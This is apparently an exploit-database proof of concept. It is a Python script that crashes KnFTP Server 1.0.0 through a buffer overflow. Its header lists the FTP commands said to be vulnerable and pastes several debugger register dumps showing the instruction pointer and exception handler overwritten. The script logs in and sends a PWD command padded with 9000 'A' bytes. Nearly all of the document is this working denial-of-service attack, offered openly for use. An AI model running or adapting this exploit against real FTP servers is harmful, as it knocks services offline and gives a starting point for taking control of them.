KnFTP 1.0.0 Buffer Overflow

`#!/usr/bin/python  
  
# Title: KnFTP Server Buffer Overflow Exploit (DoS PoC)  
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)  
# Found by: loneferret (kinda)  
# Bug that made me fuzz this app by Blake: http://www.exploit-db.com/exploits/17819/  
  
# Date Found: Sept 18th 2011  
# Tested on: Windows XP SP2/SP3 Professional (DEP off)  
# Nod to the Exploit-DB Team  
  
# Vulnerable commands: MKD / LS / ABOR / CD / APPE / REST / PWD  
# So it just looks like all this app's commands are vulnerable. Even commands  
# that the server doesn't support. SEH and/or EIP gets overwriten.  
# It's almost like this application was made to be vulnerable.  
# Anyway have fun.  
  
#EAX 7EFEFEFE  
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA...  
#EDX 41414141  
#EBX 00C7FE92 ASCII "MKD"  
#ESP 00C7CD94  
#EBP 00C7CDC4  
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA...  
#EDI 00C7FFFE  
#EIP 77C460C1 msvcrt.77C460C1  
#C 0 ES 0023 32bit 0(FFFFFFFF)  
#P 1 CS 001B 32bit 0(FFFFFFFF)  
#A 0 SS 0023 32bit 0(FFFFFFFF)  
#Z 1 DS 0023 32bit 0(FFFFFFFF)  
#S 0 FS 003B 32bit 7FFDE000(FFF)  
#T 0 GS 0000 NULL  
#D 0  
#O 0 LastErr ERROR_SUCCESS (00000000)  
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)  
#ST0 empty 0.00000000000000000000  
#ST1 empty 0.00000000000000000000  
#ST2 empty 2.1219957909652723000e-314  
#ST3 empty 0.00000000000000000000  
#ST4 empty 0.00000000000000000000  
#ST5 empty 0.00000000000000000000  
#ST6 empty 0.00000000000000000000  
#ST7 empty 1.2519775166695107000e-312  
# 3 2 1 0 E S P U O Z D I  
#FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)  
#FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1  
  
  
#EAX 7EFEFEFE  
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA...  
#EDX 41414141  
#EBX 00C7FE92 ASCII "LS"  
#ESP 00C7CD94  
#EBP 00C7CDC4  
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA...  
#EDI 00C7FFFF  
#EIP 77C460C1 msvcrt.77C460C1  
#C 0 ES 0023 32bit 0(FFFFFFFF)  
#P 1 CS 001B 32bit 0(FFFFFFFF)  
#A 0 SS 0023 32bit 0(FFFFFFFF)  
#Z 1 DS 0023 32bit 0(FFFFFFFF)  
#S 0 FS 003B 32bit 7FFDE000(FFF)  
#T 0 GS 0000 NULL  
#D 0  
#O 0 LastErr ERROR_SUCCESS (00000000)  
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)  
#ST0 empty 0.00000000000000000000  
#ST1 empty 0.00000000000000000000  
#ST2 empty 2.1219957909652723000e-314  
#ST3 empty 0.00000000000000000000  
#ST4 empty 0.00000000000000000000  
#ST5 empty 0.00000000000000000000  
#ST6 empty 0.00000000000000000000  
#ST7 empty 1.2519775166695107000e-312  
# 3 2 1 0 E S P U O Z D I  
#FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)  
#FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1  
  
#SEH chain of thread 000001BC, item 0  
#Address=00C7FFDC  
#SE handler=41414141  
  
#EAX 7EFEFEFE  
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA...  
#EDX 41414141  
#EBX 00C7FE92 ASCII "ABOR"  
#ESP 00C7CD94  
#EBP 00C7CDC4  
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA...  
#EDI 00C7FFFD  
#EIP 77C460C1 msvcrt.77C460C1  
#C 0 ES 0023 32bit 0(FFFFFFFF)  
#P 1 CS 001B 32bit 0(FFFFFFFF)  
#A 0 SS 0023 32bit 0(FFFFFFFF)  
#Z 1 DS 0023 32bit 0(FFFFFFFF)  
#S 0 FS 003B 32bit 7FFDD000(FFF)  
#T 0 GS 0000 NULL  
#D 0  
#O 0 LastErr ERROR_SUCCESS (00000000)  
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)  
#ST0 empty 0.00000000000000000000  
#ST1 empty 0.00000000000000000000  
#ST2 empty 2.1219957909652723000e-314  
#ST3 empty 0.00000000000000000000  
#ST4 empty 0.00000000000000000000  
#ST5 empty 0.00000000000000000000  
#ST6 empty 0.00000000000000000000  
#ST7 empty 1.2519775166695107000e-312  
# 3 2 1 0 E S P U O Z D I  
#FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)  
#FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1  
  
  
import socket  
  
  
buffer = "\x41" * 9000  
  
  
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
connect=s.connect(('xxx.xxx.xxx.xxx',21))  
s.recv(1024)  
s.send('USER test\r\n')  
s.recv(1024)  
s.send('PASS test\r\n')  
s.recv(1024)  
s.send('PWD ' + buffer + '\r\n')  
s.recv(1024)  
s.send('QUIT\r\n')  
s.close  
  
`